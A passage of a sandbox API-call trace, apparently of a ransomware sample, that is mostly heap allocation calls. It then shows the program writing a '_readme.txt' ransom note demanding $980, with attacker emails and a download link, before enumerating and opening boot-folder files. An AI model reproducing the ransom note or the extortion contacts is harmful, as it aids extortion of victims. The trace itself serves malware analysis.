Size=0x20) returned 0x31ed6c0 [0227.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.930] PathFindFileNameW (pszPath="C:\\Boot\\en-US\\") returned="en-US\\" [0227.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.930] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.930] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.930] PathFindFileNameW (pszPath="") returned="" [0227.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.930] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.931] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0227.931] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a3390 [0227.932] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.932] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.932] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.932] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.932] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x81c) returned 0x37a3390 [0227.932] PathAppendW (in: pszPath="C:\\Boot\\en-US\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0227.932] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.932] PathFileExistsW (pszPath="C:\\Boot\\en-US\\_readme.txt") returned 0 [0227.932] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0227.932] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.932] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0227.933] CreateFileW (lpFileName="C:\\Boot\\en-US\\_readme.txt" (normalized: "c:\\boot\\en-us\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0227.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.933] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.933] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.933] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0227.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7418 [0227.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.934] PathFindExtensionW (pszPath="C:\\Boot\\en-US\\bootmgr.exe.mui") returned=".mui" [0227.934] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7418 | out: hHeap=0x630000) returned 1 [0227.934] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0227.934] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.934] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7418 [0227.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.934] PathFindExtensionW (pszPath="C:\\Boot\\en-US\\memtest.exe.mui") returned=".mui" [0227.934] CreateFileW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7418 | out: hHeap=0x630000) returned 1 [0227.934] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, 